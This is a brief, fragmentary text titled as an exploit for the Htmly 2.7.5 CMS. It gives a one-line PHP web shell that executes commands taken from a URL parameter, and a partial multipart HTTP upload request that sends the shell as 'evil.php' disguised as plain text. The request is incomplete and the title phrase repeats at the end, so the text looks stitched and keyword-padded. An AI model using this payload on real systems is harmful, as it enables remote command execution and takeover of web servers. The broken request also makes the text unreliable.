Htmly 2.7.5 Exploit Direct

<?php system($_GET['cmd']); ?>

POST /upload HTTP/1.1 Content-Type: multipart/form-data ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="evil.php" Content-Type: text/plain htmly 2.7.5 exploit